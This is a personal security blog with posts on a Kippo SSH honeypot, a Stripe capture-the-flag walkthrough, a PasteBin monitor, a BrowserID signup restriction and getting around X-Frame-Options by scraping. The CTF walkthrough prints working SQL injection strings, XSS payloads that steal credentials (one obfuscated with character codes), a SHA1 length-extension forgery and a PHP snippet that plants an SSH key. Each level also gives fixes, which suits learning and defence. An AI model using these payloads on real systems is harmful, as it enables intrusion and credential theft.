Monday, October 22, 2012

Mozilla Intern Presentation

As my experience as an intern at Mozilla slowly comes to an end, I've had some time to reminisce on the work I've done and projects I've been a part of. Last week, I had the opportunity to give a presentation to the Mozilla community about my intern work. Here is a link to that presentation from Air Mozilla:

Sunday, October 21, 2012

Kippo Honeypot on Amazon EC2 Instance Free Tier

A project I've had in mind for a while is to use Amazon's Cloud (specifically an EC2 instance) to setup a honeypot. Luckily, Amazon has been offering a low end, free tier of service for an EC2 instance, which is just what I need for this project. In this post I'm going to walk through exactly what I did to setup a medium-interaction honeypot known as "Kippo" on an Amazon EC2 instance completely for free (at least for one year). This isn't as straightforward as it seems because, with the free tier, you only get one IP address. This means you can't setup your honeypot for SSH on one IP and the admin/machine SSH on another. Don't worry though, we'll fix that.

Setting up an EC2 Instance

The first step to setting up the honeypot is to subscribe to Amazon's EC2 service. You'll need to go through the registration and enter a credit card, but they won't charge anything to it. You'll also need to enter a phone number to receive a code in order to verify your identity. I'm not going to walk through that process here, but you can sign up and read more here:

Once your account is created, open up the AWS Management Console. It should look like this:

Click on "EC2". Now, launch an instance by clicking "Launch Instance."
Choose the "Classic Wizard" and continue. Now, select the Ubuntu Server 12.04 64-bit image (note: instances included in the free tier are marked with a star).
Choose one instance, and an instance type of "Micro" with 613MB memory (note: this is also marked with a star).
Click "continue" through instance details, nothing needs to be changed. Next, create a key pair and save the resulting .pem file. You will need this to SSH to the server. For a security group, select the quick-start group from the left.
Now, you can review your instance and create it. The instance may take some time to initialize. Once it finishes, you should see it running under "instances."

Getting an IP Address

Now, create a new elastic IP for your machine. This will allow your machine to retain a single IP through which attackers can SSH. Click on "elastic IPs" under "Network and Security." Then, allocate a new IP address. In many cases, honeypots will have two network interfaces - one for the attack surface, another for management. Each interface would have a different IP address to separate the attack surface from the management. However, Amazon's free tier allocates only a single elastic IP. Do not create a second IP or you may be charged for additional usage.

Once you have an IP, make sure it is pointing to your running instance.

SSH to the Instance

We can now connect to the instance via SSH. Make sure you are in the folder in which you saved your .pem file from Amazon. Then, ssh using the following command:

ssh -v -i <your-key>.pem ubuntu@ec2-<ip-address>

"Ubuntu" is the default username for the instance.

Change the SSH Port

To get around the IP address restrictions, we're going to run the management SSH on a non-standard port and the honeypot on the typical port 22. This will allow us to both obscure the management connection and increase the number of attacks seen by the honeypot (almost every attacker will try port 22 for SSH first). To change ports, we need to edit the configuration file for the already-running SSH server and then restart the service. Do this carefully or you may lose access to your machine.

Begin by editing your SSH config file located here: /etc/ssh/sshd_config

At the very top of the file are the following lines:

# What ports, IPs and protocols we listen for
Port 22

Change this port number to something between 49152 and 65535. Make sure you write it down and do not forget the port number you selected.

Now, restart the SSH service by running:

/etc/init.d/ssh restart

When you run this command you will likely be disconnected from your machine. Hopefully you "restarted" and didn't "stop."

You will now need to edit the Amazon security rules within your AWS console to allow your new port on inbound connections. To do this, click "Security Groups" under "Network & Security." Then, click on the "quick-start-1" group and then the "Inbound" tab. Add your new port number and be sure to apply the changes.
You can see that my port is 50683 in this case.

Now, reconnect to the machine by running the following command. Note the added -p parameter to specify the port number.

ssh -v -i <your-key>.pem ubuntu@ec2-<ip-address> -p <port>

*Note: you can create an SSH configuration so you don't need to specify all these options for every connection  but that is beyond the scope of this guide.

Hopefully you have reconnected to your machine. SSH is now running on a port other than 22 which will allow us to use the standard SSH port for our honeypot.

Installing Kippo

We can now install Kippo and begin configuring our honeypot. I am not going to re-write a guide for the installation process as it is well-documented and many guides already exist. This is a great guide, written for CentOS, but the process is very similar:

*Note that you should not need to update Python. Also, when downloading the Kippo source, be sure to use the latest version as this guide is a bit old. Finally, you will need to add the IPTABLES rule to redirect port 22 traffic to port 2222.

Once everything is installed and running, you should be able to issue the command:

ssh root@<your-ip>

and be logged into your honeypot.

Viewing Logs

One of the best parts of Kippo is that it logs every interaction an attacker has with the system. These logs are saved in /home/kipuser/kippo/log/
*kipuser may be replaced with the username of the kippo user you created.

To replay the logs, copy the file "" from kippo/utils into the kippo/log/tty folder, then issue the command:

sudo python <log-name>.log 0

This will replay the attacker's interaction with the system.

Further Resources

Wednesday, August 29, 2012

Stripe Capture the Flag - Level by Level Walkthrough

Last week, Stripe, a web payments company, launched an online web security-based capture the flag event which ended today (Wednesday) at noon. The event was designed to challenge participants on some very common, as well as lesser-known vulnerabilities that exist in web applications. I decided to try my hand at some of the challenges and was fortunate enough to make it through all eight levels and earn myself an awesome prize (a Stripe T-Shirt)! I spent a bit of time after each level collecting notes about what I had tried, what worked, what didn't, and why the vulnerability existed. Some of the challenges really required out-of-box thinking, but capturing the password, and eventually the flag, was a truly rewarding experience.

I have decided to make this blog post detailing each level now that the contest has ended. Stripe is releasing the CTF as a download for other organizers to run or to run locally, so if you haven't participated yet and may wish to in the future, I'd stop reading here because there are some very big spoilers ahead.

I am going to break down each level into: a description and background explanation (so even if you didn't participate in the challenge, you can still get an understanding of what is happening), what the vulnerability was, and remediation methods.

Note: All of my code solutions are also posted to my GitHub account. They are posted as-is and are not guaranteed to work without modification for your account/instances.

Level 0 - The Secret Safe
The first level starts us off with a simple application. The Secret Safe is a form, written in JavaScirpt and the Mustache JS framework with a SQLite backend, that allows uses to enter a name, a secret name, and a secret, then save it in the database. The secrets can then be viewed by entering the name in a search field. We are told that the password to level one is stored in the database as one of the secrets. However, we don't know the namespace used to save the secret, and thus, cannot simply search for it. Trying out the application a few times allows us to see the functionality, which is relatively simple. Secrets can only be retrieved by entering the correct namespace in the box "view secrets for." Or can they?

Luckily (for the attacker), the SQL statement used to retrieve the stored secrets is vulnerable to SQL injection. SQL injection allows us to enter arbitrary text that is interpreted as part of the actual SQL command. Here is the exact SQL statement that is used when the user searches for a secret.

SELECT * FROM secrets WHERE key LIKE ? || ".%"

The notation above appends the term entered by the user to the end of the statement using the || characters to append the term, represented by the ".%". For example, if we were to enter the term "test," the final statement would look like this:

SELECT * FROM secrets WHERE key LIKE "test"

The fact that the application uses the input from the user directly, without first escaping any characters that could cause issue with the query, is the basis for our exploit. Let's assume that the user enters the character "%" as the search term. In SQL, the % character is considered a wildcard. Let's look at the statement when % is entered:

SELECT * FROM secrets WHERE key LIKE "%"

This statement will cause all results to be returned because the % character will match all the results in the database. Entering a % gives us the following result (and the needed password):

The fundamental problem with this web application (and the cause of most web application vulnerabilities) is that it fails to treat user-entered input as unsafe. Information that is provided by the user in any shape or form should never be trusted by the application without first checking the input. Each application has different methods of escaping data that is entered by the user before crafting a SQL query, so the appropriate method for the language being used should be implemented. However, even safer queries can be generated by considering the kinds of input. For example, an input asking for a user's name should never allow characters such as @, &, (, <, >, etc.).

Level 1 - Guessing Game

Level one implements a simple guessing game. In order to determine the password to the next level, a secret combination must be provided. The level uses PHP to load a file on the server, read its contents, and compare it to the parameter provided via GET (passed in via a form). If the parameter matches the combination, then the password is released.

One technique developers use in PHP applications is to assign parameters using the extract() function. This function takes a URL such as:

and assigns the variable $attempt the value "test." This works well when there are many variables to be retrieved (such as submitting a large form) because it negates the need to assign each variable individually:

$attempt = $_GET['attempt'];
$var2 = $_GET['next_var'];

However, extract introduces a security risk because it allows variables that have been previously set to be overridden using input. For example, in the application code, the variable $filename is set before extract() is used. If we provide our own filename variable, we can overwrite the original:


In this case, we are setting both the attempt and the filename variables to the empty string "". By following the logic of the code, we can now see that this will cause the combination variable to also set to "" since the filename is blank. Finally, this will cause the if statement:

if($attempt === $combination)

to evaluate to true, releasing our password.

Although the extract() function is dangerous in its native form, its security can be improved by using extract() with the EXTR_SKIP option. This option prevents already defined variables (such as $filename in the above example) from being overwritten by $_GET or $_POST variables. In addition, prefixes can be used to append a string to the variable if it overwrites an existing one using the EXTR_PREFIX_SAME option.

Level 2 - Social Network

The social network is a basic application that allows for images to be uploaded as a profile picture. There is little more functionality beyond that, but that is all that is needed to exploit this level.

The vulnerability in level two is so severe that it is used in the attacks of future levels. The developers of the application allow users to upload files but do not restrict the uploads in any way. Although the upload page asks the user to upload an image, we can upload any file we like. Since the page is written in PHP, we can safely assume a PHP server is running and upload our own PHP files for execution. Analyzing the code shows us that the password is stored in a file called "password.txt." Using the file_get_contents() function of PHP, we can create a very simple page which will retrieve our password:

echo file_get_contents("../password.txt");

Note that we need to use ../ to go up to the user directory from the uploads directory where our page is saved. Running the page from the uploads directory gives us the password needed for level three.

The main vulnerability here is that the upload page accepts files of any type. PHP allows upload restrcitions based on the MIME type (i.e. image/png, image/jpg, etc.). A file's extension should not be used as a sole valid check because anyone can change the extension of a file, although it can be compared to the MIME type for a bit of added security. Since MIME can be spoofed or arbitrary code can be inserted into an image file, the best option is to use a combination of MIME and extensions, check the MIME type on upload, and manually assign an extension based on the MIME type.

Level 3 - Secret Vault

Level three appears to be a simple login-based application. In order to determine the password, we need to login using a valid username and password. This application is written in Python (more specifically, the Flask framework) with a SQLite backend.

As with level zero, the input from the user is not properly escaped before being compiled as part of the SQL query. This allows us to inject malicious SQL to return the user "bob" who holds the password to level four. Below is the exact query that is vulnerable:

query = """SELECT id, password_hash, salt FROM users WHERE username = '{0}' LIMIT 1""".format(username)

The query is executed using cursor.execute(query) in Python. The execute function prevents us from simply ending the first query with a semicolon and beginning a new query such as:

bob; UPDATE users SET salt='' WHERE username='bob'

or something similar to directly modify the data in the database. However, we can use the UNION keyword to extend the original query and return the information we want. In SQL, UNION merges the results of the left hand query with that of the right. By entering the following query as the username, we can set the values of password_hash and salt to ones we know:

bob' UNION SELECT 1 as id, 'd74ff0ee8da3b9806b18c877dbf29bbde50b5bd8e4dad7a3a725000feb82e8f1' as password_hash, '' as salt FROM users WHERE'1'='1

To determine the value of the password_hash, we need to determine what function the application is using to calculate it. Looking at the code reveals that it is sha256. An online hash calculator allows us to determine a hash for a password we know, such as "pass" in the example above.

By setting the salt to the empty string '', we are causing only the password we entered in the password box, "pass," to be hashed. When it is, it matches the hash we provide, thus giving us access to the user account. The final statement, with the injection looks like:

SELECT id, password_hash, salt FROM users WHERE username = 'bob' UNION SELECT 1 as id, 'd74ff0ee8da3b9806b18c877dbf29bbde50b5bd8e4dad7a3a725000feb82e8f1' as password_hash, '' as salt FROM users WHERE'1'='1'

As with level zero, user input should never be trusted. In this case, the first single quote after "bob" allows us to break out of the original statement. By properly escaping the input, this injection could be prevented.

Level 4 - Karma Fountain

The concept of Karma Fountain is that users send other users "karma." However, to prevent abuse, the application also sends the password of the sending user to the recipient. A "super user" known as Karma Fountain has unlimited Karma to share. If Karma Fountain were to send Karma to someone, its password would also be exposed. The application prevents users from logging in as Karma Fountain. Finally, we are told that Karma Fountain logs into its account every few minutes.

To find the vulnerability, we first need to determine what we can attack. By looking at the code, it is evident that one user-input field is not being escaped that is also displayed back to users of the application: the password field. The following code shows that the username is checked to ensure it contains only word characters, but no such protection is in place for the password field:

     username =~ /^\w+$/die("Invalid username. Usernames must match /^\w+$/", :register)

Now that we have determined that the password field is not escaped, we need to determine an attack type. Since the password field is shown to all users who have received Karma from us, we can launch a cross-site scripting attack against Karma Fountain by sending it karma from an account with a password containing XSS.

To execute an XSS, we need to determine what is happening when we send karma. By using any intercepting proxy (such as BurpSuite or Zed Attack Proxy) or even using the web developer tools in the Firefox or Chrome browsers, we can see the exact request made to send karma.

As this shows, a POST is made to transfer/ with the parameters "amount" and "to." We now know that we need to craft an XSS that will make a POST request to with "transfer" set to any amount and the "to" field set to our username. Below is the XSS I used to do just that:

<script>var xmlhttp=new XMLHttpRequest();"POST","transfer",true);xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded");xmlhttp.send("to=one&amount=25");</script>

By setting this string as the password of my account, I could then login, send Karma Fountain some karma, and wait until it logged in, executed my script, and posted karma to my account, exposing its password. The above XSS payload could also be written in JQuery using $.post if the site is using JQuery.

As with SQL injection, XSS is made possible by the direct use of user input as part of a page. In this case, the password field is the only input that is not checked. XSS is prevented by properly encoding the output from stored user input before it is executed as part of the page itself. Every language and framework has varying methods for preventing XSS (such as htmlentities and htmlspecialchars in PHP). You can read more about preventing XSS at this OWASP page.

Level 5 - Domain Authenticator

The Domain Authenticator is an application that allows users to provide a "pingback URL," a username, and a password to login. The pingback is essentially a website that validates the credentials and responds with AUTHENTICATED or DENIED. The response also includes the host, so for example, if "" is provided, you will be authenticated as The goal is to authenticate as a level five user. However, the level five machines only have limited network connectivity to other stripe-ctf servers.

The vulnerability in this level lies in a programming error that allows us to recursively chain pingbacks as well as how the host is checked. The level 5 server URL allows a /?pingback parameter to be used. So visiting the following URL would set the pingback as "":

Knowing this, we can exploit the remote file vulnerability that exists in level two to upload a file that will always return AUTHENTICATED. I uploaded the following file, named pingback.php, to level two:


However, trying to add just that URL as the pingback will only allow us to authenticate as a member of a level two machine since the host is a level two server. We want the response to come from a level five server. To do this, we can recursively string our URL such as:

Entering this URL in the URL field causes the response to recursively appear to come from a level five machine, allowing us to gain access.

This vulnerability is introduced because of programming logic error. The developers did not consider that a user would recursively chain pingback URLs. It just goes to show that user input should always be treated as untrusted and to expect the unexpected. The security of this application can be enhanced by carefully deciding what input should be accepted.

Level 6 - Streamer

Streamer is a miniature Twitter-style application. Users post an update and all other users see it. There is one user, level07-password-holder, who checks in periodically (every three to four minutes) to see the latest updates. After creating an account, anyone can post updates which are seen by all other users. By visiting the url ajax/posts, a JSON string of all the previous posts can be viewed. When posting an update, a POST is made to that same URL with a post title, body, and CSRF token. The post body cannot contain quotes, or it is rejected. Finally, in order to remind users of their passwords, the application stores user credentials on a page called "user_info" which is available upon logging in. We are told that the level07-password-holder's password is complex and contains both single and double quotes, which is important.

The vulnerability in Streamer is similar to the one in Karma Fountain (cross-site scripting). However, this level challenges the user to carefully craft an XSS attack that will obtain the required pieces of information and make the correct POST. Knowing that the level07-password-holder logs in every few minutes gives us an opportunity to create a payload. First, we have to find how the data is being retrieved and presented.

Streamer uses a JSON string of posts which is uses to update the posts/ page as well as save new POSTs of posts. To exploit the XSS, we need to break out of the returned JSON string and execute arbitrary code on the page without using quotes. A simple script allows us to do that:


Entering this code as the body of a post and then refreshing the page causes the alert to appear. We now have the format for our XSS.

By looking at the source of the page, we can tell that JQuery is being used. This will make our attack much easier by giving us functions to work with and reducing the amount of code needed. It is also evident that a CSRF token is being used. Cross-Site Request Forgery is an attack that allows remote users to POST to a page from any other webpage, not just the page with the form. You can read more about CSRF here because our application is not vulnerable to CSRF thanks to the token. The token, however, is a necessary part of the POST request, so our XSS must obtain it before doing a POST.

Note: there are a number of ways this level can be solved using XSS. For example, I used JavaScript to find the CSRF token, then used GET to get the page with the user's credentials, obtained from the user_info page and POSTed all the results to the ajax/posts page. However, it is also possible to obtain the credentials, change the value of the textbox to match them, then submit the form, all using JQuery. In some cases, it is also possible to simply steal the user's session cookies, but this application used httponly cookies which prevent scripts from accessing them.

The methodology for this attack is to make a GET request to the user's user_info page (which contains his credentials), save the response, then POST the response to the ajax/posts page. Below is an XSS payload I used to do just that. Note that I used a replace function to remove the quotes before POSTing to prevent the password from escaping out of the JSON.

$.get("user_info", function(result){
        var data = $(result).find('td').text();
        var csrf_token = document.forms[0].elements["_csrf"].value;
        var replaced = data.replace(/"/g, "YY");
        replaced = data.replace(/'/g, "XX");
        $.post("ajax/posts", { title: "THIS", body: replaced, _csrf: csrf_token } );

This payload now needs to be converted to character codes to avoid the use of quotes. Using an online converter such as this one, our attack now looks like:

}];</script><script>eval(String.fromCharCode(36, 46, 103, 101, 116, 40, 34, 117, 115, 101, 114, 95, 105, 110, 102, 111, 34, 44, 32, 102, 117, 110, 99, 116, 105, 111, 110, 40, 114, 101, 115, 117, 108, 116, 41, 123, 10, 32, 32, 32, 32, 32, 32, 32, 32, 118, 97, 114, 32, 100, 97, 116, 97, 32, 61, 32, 36, 40, 114, 101, 115, 117, 108, 116, 41, 46, 102, 105, 110, 100, 40, 39, 116, 100, 39, 41, 46, 116, 101, 120, 116, 40, 41, 59, 10, 32, 32, 32, 32, 32, 32, 32, 32, 118, 97, 114, 32, 99, 115, 114, 102, 95, 116, 111, 107, 101, 110, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 102, 111, 114, 109, 115, 91, 48, 93, 46, 101, 108, 101, 109, 101, 110, 116, 115, 91, 34, 95, 99, 115, 114, 102, 34, 93, 46, 118, 97, 108, 117, 101, 59, 10, 32, 32, 32, 32, 32, 32, 32, 32, 118, 97, 114, 32, 114, 101, 112, 108, 97, 99, 101, 100, 32, 61, 32, 100, 97, 116, 97, 46, 114, 101, 112, 108, 97, 99, 101, 40, 47, 34, 47, 103, 44, 32, 34, 89, 89, 34, 41, 59, 10, 32, 32, 32, 32, 32, 32, 32, 32, 114, 101, 112, 108, 97, 99, 101, 100, 32, 61, 32, 100, 97, 116, 97, 46, 114, 101, 112, 108, 97, 99, 101, 40, 47, 39, 47, 103, 44, 32, 34, 88, 88, 34, 41, 59, 10, 32, 32, 32, 32, 32, 32, 32, 32, 47, 47, 114, 101, 112, 108, 97, 99, 101, 100, 32, 61, 32, 100, 97, 116, 97, 46, 114, 101, 112, 108, 97, 99, 101, 40, 47, 92, 34, 47, 103, 44, 32, 34, 88, 88, 34, 41, 59, 10, 32, 32, 32, 32, 32, 32, 32, 32, 10, 32, 32, 32, 32, 32, 32, 32, 32, 36, 46, 112, 111, 115, 116, 40, 34, 97, 106, 97, 120, 47, 112, 111, 115, 116, 115, 34, 44, 32, 123, 32, 116, 105, 116, 108, 101, 58, 32, 34, 84, 72, 73, 83, 34, 44, 32, 98, 111, 100, 121, 58, 32, 114, 101, 112, 108, 97, 99, 101, 100, 44, 32, 95, 99, 115, 114, 102, 58, 32, 99, 115, 114, 102, 95, 116, 111, 107, 101, 110, 32, 125, 32, 41, 59, 10, 32, 32, 32, 32, 125, 41, 59))</script>//

Once the attack is crafted, we can post it as an update, wait for the level07-password-holder to log in, then visit ajax/posts where we should see the password.

Again, this attack relies on the application to treat user data as untrusted. By properly escaping all data that users input, this attack can be avoided.

Level 7 - WaffleCopter

WaffleCopter is a food delivery service that has a set of user "levels." The earlier users (determined by user_id) are "premium" users and can order premium waffles. You, however, are not, and can therefore not order premium waffles. The goal of the challenge is the order a premium waffle without being a premium user.

Upon logging in, you are given an API endpoint, a user_id, and a secret. Using this information, you can POST to the endpoint using your secret and user_id to order a waffle. The application checks that you are a premium user before allowing a premium order.

The application also allows you to view logs of previous API requests. By viewing the following URL, you can see all of your requests: https://<level7_server><your_user_id>. Replacing your user_id with "1" (a premium user) gives the following results:

2012-08-23 08:04:55 /orders count=10&lat=37.351&user_id=1&long=-119.827&waffle=eggo|sig:75c0741cc140d77f70bca0cb473788249f1fd0fe

2012-08-23 08:04:55 /orders count=2&lat=37.351&user_id=1&long=-119.827&waffle=chicken|sig:bbab520cfdd9b8b91df1e613b0525d252b7c777b

This page shows that a signature is appended to the request. To calculate the signature, an algorithm called SHA1 is used, as in the following code:

def _signature(self, message):
     h = hashlib.sha1()h.update(self.api_secret + message)
     return h.hexdigest()

The vulnerability in this application comes from the fact that it is using SHA1 to calculate the signature. A well-known weakness of SHA1 is that it is vulnerable to an attack known as hash length extension. I am not going to delve into the cryptography involved, but here is a simple explanation from WhiteHat Security:

If you have a message that is concatenated with a secret and the resulting hash of the concatenated value (the MAC) – and you know only the length of that secret – you can add your own data to the message and calculate a value that will pass the MAC check without knowing the secret itself.

Ultimately, because of the way SHA1 is designed, we can inject arbitrary data onto the end of a request following a padding, calculate a valid signature, and send this as the new request. Since we know the signature of user_id 1 from the API logs, as well as the length of the key, we can now calculate a new extended and padding message and a new signature that will pass the check.

To do this, a tool called "" was developed. It can be downloaded here: This tool takes the following parameters: <keylen> <original_message> <original_signature> <text_to_append>

We have the key length (14). The original message is a request from the API such as: "count=2&lat=37.351&user_id=1&long=-119.827&waffle=chicken". We also have the original signature (in my case: bbab520cfdd9b8b91df1e613b0525d252b7c777b). The text we want to append is this: "&waffle=liege". This will override the first variable "waffle" and replace "chicken" with "liege," the name of a premium waffle.

Running our tool gives us the following output:

new msg: 'count=2&lat=37.351&user_id=1&long=-119.827&waffle=chicken\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x028&waffle=liege'
new sig: 15fa901713b0252d03b30f206ad58aee06e6d846

We can now make a POST request to our end point using our new message and the new signature.

This vulnerability is introduced because of the use of an insecure cryptographic function, SHA1. Many better alternatives to SHA1 have been developed, including HMAC. It would also help if the API logs of users were only available to those users (this would prevent us from getting the needed signature).

Level 8 - Chunk Servers

The last level of the CTF is rightfully the most challenging. It really requires thinking outside the box and it is quite difficult to spot the possible vulnerability at first. This level involves a password storing mechanism that saves passwords in chunks. For example, a 12 digit password will be stored in 4 chunks of three digits each. These chunks are then distributed throughout "chunk servers" which can be on different ports of the same physical server or distributed among remote servers. The main server receives a request for a password check, splits the password into chunks, then polls each chunk server for its piece. If the chunk is correct it returns true. This continues until either a chunk server returns false, in which case the password is returned as incorrect, or all chunk servers return true, in which case the main server returns true.

When a POST is made, there is an option for "webhooks." A webhook will be sent a copy of the response, such as "success:true" or "success:false". One additional fact makes this level a bit more difficult: the level eight servers only have network access to other stripe-ctf servers.

As with each of the levels, Stripe provided the source code for download. In the case of level eight, downloading and running the source code locally is extremely beneficial to understanding where the vulnerability may exist.

Finding the vulnerability really requires thinking about all of the information that a server returns with its response, down to the socket level. Using the following code snippet, we can make a sample request to the server and print out the information associated with the response.

data = json.dumps({"password": key, "webhooks": [""]})
req = urllib2.Request(url, data)
response = urllib2.urlopen(req)
output =

client, address = s.accept()
data_recv = client.recv(size)
if data_recv: 
     print(data + address)

Note that I have left out some import statements and other code for the sake of brevity.

When this code is executed, a response is printed, including the data response, as well as the address of the server and the port number. This information is crucial to discovering the vulnerability.

To find what is happening, we can make requests on our local server using a known correct and a known incorrect password. For example, if we start the server using password "123456789012", we can try requests with passwords "123456789012" (a correct one), "023456789012" (first chunk incorrect), "123056789012" (second chunk incorrect), etc.

By analyzing the responses, hopefully a pattern will emerge. When the error is in the first chunk, the port numbers of two successive requests increments by two (the exact change number may be different for each application instance). When it is in the third chunk, the increment is by three, and so on. This pattern allows us to develop a script that can brute force the chunks individually rather than the entire password at once (the difference between a few thousand requests and 999 billion).

Now, we need to run our script on a level two machine so that the webhook can be contacted (remember: level eight servers only have access to other stripe-ctf servers). Luckily, the level two server is running an SSH server as well, allowing us to connect. We just need to upload our public key to the ~/.ssh/authorized_keys file.

To do this, I created a simple PHP page, uploaded it to level two, and ran it. The same result could be accomplished with a PHP shell, allowing us to enter commands directly.

  file_put_contents('.ssh/authorized_keys', 'my_public_key_here') . "\n";

Now, we can SSH into the level two server.

We can then cd to the uploads folder where we can run any scripts that are uploaded via the web interface (I never did get scp working).

Back to the script, there are a number of ways it could be done. Personally, I wrote a script that checked each chunk individually, starting with the first. It would try "000", "001," "002," etc. On each request, it would analyze the port in the response. If it changed by the port increment (2 for the first chunk, 3 for the second, 4 for the third, and 5 for the fourth), it continued to the next request. However, if the change was more than the expected increment, it would pause and send two new requests with the same chunk (for example, "001" "001"). It would analyze the ports again. If the increment was not the expected increment, it would repeat the process two more times. If the ports incremented more than the expected increment more than three times in a row, the script stopped and marked the chunk as the correct one.

The rechecks are done for error correction. Because many other users were testing on the same level eight server, two ports in the right increment did not always exist. However, it was rare that that would happen three or more times in a row.

Once the chunk was found, I edited the script to test the next chunk. The overall process took about one hour. The script could be much improved by using multiple threads. I am uploading my scripts to GitHub, but they require edits before being usable on systems and user accounts different than mine.

Eventually, after the third chunk was found, I switched to polling the main server for the full chunk: xxxxxxxxx000, xxxxxxxxx001, etc. When it returned true, I had found the flag!

The vulnerability in this application is another programming logic error. The port that is returned in the request when a chunk is invalid should not be different from that of the main server. This again shows that attackers will use any information they can to exploit an application.


The Stripe CTF was a truly awesome experience. The challenges were crafted uniquely and with great precision. I admit that a number of these levels truly stumped me at first. But in a larger sense, they forced me to think in ways I hadn't previously thought. I hope this walkthrough has been beneficial and that this entire contest raises more awareness about web security as a whole.


During the CTF I was Googling like crazy. Here are just a few of the resources I used while working on the CTF and in writing this post.

Monday, August 6, 2012

Random Project - PasteBin Searcher

I have recently begun learning Python and, like anything I've tried to learn, needed a project in order to help me get started. So, for something simple, I decided to create a tool that periodically searches the website PasteBin for a user-provided term.

PasteBin has commonly been used by computer criminals to post and share information. This information can range from user accounts (Anonymous uses PasteBin frequently to dump lists of users and passwords) to credit card numbers and other personal information. The tool I've created allows a user to enter a regular expression as a search term. It then queries PasteBin every 5-10 seconds and looks at recently posted pastes for that term.

For use cases, credit card companies could adapt the script to monitor PasteBin for posted credit card numbers and then immediately lock those accounts (credit cards have unique regexes and each company has a unique number structure).

This was just a very basic project that allowed me to familiarize myself with Python and fetching URLs, regexes, and try/excepts.

Monday, July 23, 2012

Domain-Specific Sign-In with BrowserID

BrowserID (Persona) is Mozilla's login authentication system that treats emails as identities and usernames. By default, BrowserID works by simply providing verification that a user actually owns the email which they are using to log in. There are no additional checks made before the user is enrolled as a "user" on the site. This functionality is great for websites that want to simplify logins and allow anyone to sign up. But suppose your website needs to limit signups to valid users of your organization (i.e. everyone with a email)?

Recently, while working on a project with Mozilla, I came across the need to restrict signups for a site I was working on. Although there has been some attempt to do this in the past (some Mozilla projects use BrowserID and still require additional verification), I could not find much documentation on restricting signups at the moment of login using email addresses. So I made my own and here it is!


To start this guide is written for Django projects, specifically those using Mozilla's Playdoh framework. If you aren't using Playdoh, I suggest trying it out - it really simplifies Django development and helps get projects started in seconds. Also, Playdoh comes pre-setup with BrowserID. If you decide not to use Playdoh, you can still follow this tutorial, you'll just need to setup BrowserID on your own first. There are a number of guides for doing that (such as this one:

Step 1 - Modify Project Settings

There are two settings files you need to edit (assuming Playdoh is being used; if not, look for in your project): settings/ and settings/

In settings/

Add the following lines in the "BrowserID" section (or at the bottom of the page):


Replace "project" with the name of your project and "app" with the name of your app.

Save the file.

In settings/

Add the following line:


Replace the commented line with a list of domains, comma-separated from which you would like to allow users. For example, the project I'm working on has the following setup:


Save the file.

Step 2 - Create a util File

In your application's home directory (not the project directory), create a file called "" Add these lines to that file:

from django.contrib.auth.models import User
from django.conf import settings
from project import app

def create_user(email):
    domain = email.rsplit('@', 1)[1]
    if domain in settings.ACCEPTED_USER_DOMAINS:
            return User.objects.create_user(email, email)

Replace "project" and "app" with your project's and app's names.


Now, when your users click the "Sign In with BrowserID" button, they must use an accepted domain before their account will be created. If not, they will be redirected to the homepage without being logged in.


If you prefer video instruction you can follow along with, here you go:

Friday, July 13, 2012

Defeating X-Frame-Options with Scraping


Iframes are an element of web design that are loved and hated. Web developers (used to) love them because they easily allowed resources from various sites to be loaded on-demand within a webpage. Security professionals hate them because they allow content of one site (such as a login page) to be loaded within another site that may not be trusted. This introduces a security concern known as click-jacking where a malicious site overlays invisible elements over what the user believes is a safe login form.

The Solution

Since these concerns arose, the X-Frame-Options header was developed to prevent the loading of one site within an iframe of another. This header is supported by all major browsers and includes two options:
  • SAMEORIGIN - the site can only be loaded within pages of the same domain
  • DENY - the page cannot be loaded in a frame at all

Page Scraping

The goal of X-Frame-Options, as described above, was to prevent the loading of one site within another, potentially malicious site. However, there are multiple ways a site's contents can be displayed, and an iframe is only one. Page scraping can be done via a server-side PHP, Python, or other language script. The code below is an example of how a page's code can be loaded using PHP:


$userAgent = 'Googlebot/2.1 (';
$url = "";
$ch = curl_init();
curl_setopt($ch, CURLOPT_USERAGENT, $userAgent);
curl_setopt($ch, CURLOPT_URL,$url);
curl_setopt($ch, CURLOPT_FAILONERROR, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_AUTOREFERER, true);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,true);
curl_setopt($ch, CURLOPT_TIMEOUT, 10);
$html = curl_exec($ch);

echo $html;


This small bit of code, when loaded on any website, at any URL, will cause the contents of Yahoo's home page to be displayed. A malicious user could overlay hidden elements over the $html echoed out and easily execute the same attack X-Frame-Options prevents.


Luckily, some large websites like Google and Facebook are aware of issues like these and use a complex combination of user-agent and IP address checks to prevent server-based scripts from loading their content. Replace with in the code above and you'll notice that nothing loads.

You Don't Even Need a Server!

This problem is not typically able to be replicated on a simple HTML page without server-side code because JavaScript has cross-domain policies that prevent it from retrieving content from a different domain (in other words, you can't scrape the HTML using just JavaScript). However, through some clever trickery, has enabled JavaScript scraping. What is actually happening is the JavaScript makes a call to a server hosted on the public Internet which serves as a middle-man. So the same process is happening (server-side scraping), it is just being called locally using JavaScript.

For this to work, save the file: locally. Then, create a simple HTML page with the following code:

<script type="text/javascript" src="jsonlib.js"></script>
<script type="text/javascript">
    function fetchPage(url) {
        jsonlib.fetch(url, function(m) { document.getElementById('test').innerHTML=m.content; });

<body onload="fetchPage('')">
<div id="test">

Most likely many large websites block sites that enable this middle-man functionality. However, it is easy for anyone with access to a server to recreate the process. X-Frame-Options are very useful, but there is no need to use iframes any longer when copying the entire site's code locally works just as well. To protect yourself against these kinds of attacks, always make sure that you do not enter sensitive data on domains you do not trust. Always check the URL bar before typing!

Monday, June 25, 2012

My First Month at Mozilla

I've been working as an intern for almost a month now (3 1/2 weeks is close enough) and finally decided to get around to writing a blog post about my experiences so far. To start, Mozilla is an amazing place to work; the "we're about the open web" is not just a tag-line, it's a core principle of the entire organization.

My first week was pretty hectic. There's a phrase at Mozilla called the "Mozilla Firehose" that refers to the massive amounts of information you will take in during your first week(s) at the company. It's entirely true, although not unmanageable because there are great people to help at each step. Once I got beyond the account-setup, email-checking, bug-filing, question-asking first few days, I was able to get a good head start on what I'll be working on for the next six months.

